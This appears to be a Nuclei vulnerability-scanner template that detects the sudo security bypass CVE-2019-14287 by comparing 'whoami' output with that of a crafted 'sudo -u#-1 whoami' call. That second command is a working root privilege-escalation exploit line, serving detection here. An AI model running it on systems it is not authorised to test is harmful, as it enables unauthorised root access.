50 lines
1.7 KiB
YAML
50 lines
1.7 KiB
YAML
id: CVE-2019-14287
|
|
|
|
info:
|
|
name: Sudo <= 1.8.27 - Security Bypass
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
|
|
reference:
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
|
|
- https://www.exploit-db.com/exploits/47502
|
|
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
|
|
- http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
|
|
- http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.8
|
|
cve-id: CVE-2019-14287
|
|
cwe-id: CWE-755
|
|
epss-score: 0.30814
|
|
epss-percentile: 0.96854
|
|
cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: sudo_project
|
|
product: sudo
|
|
tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical
|
|
|
|
self-contained: true
|
|
code:
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
whoami
|
|
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
sudo -u#-1 whoami
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- '!contains(code_1_response, "root")'
|
|
- 'contains(code_2_response, "root")'
|
|
condition: and
|
|
# digest: 4a0a0047304502204e166f9afc32a9e3f2aa20cf10f4dc7c4ccc6d9ecfb25279db42ee4884fd9a09022100e24c0145e3cb670939ecba31b847513224c52277827290d7358cd3b5e8531825:922c64590222798bb761d5b6d8e72950 |